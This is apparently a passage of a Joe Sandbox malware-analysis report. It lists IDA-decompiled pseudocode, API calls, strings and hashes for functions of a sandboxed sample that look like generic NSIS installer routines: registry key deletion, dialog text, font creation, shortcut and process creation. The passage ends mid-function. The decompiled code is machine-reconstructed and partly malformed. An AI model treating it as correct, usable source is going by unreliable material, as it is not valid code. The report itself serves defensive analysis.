Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,000032D2), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

Error launching installer, xrefs: 004052F8
C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
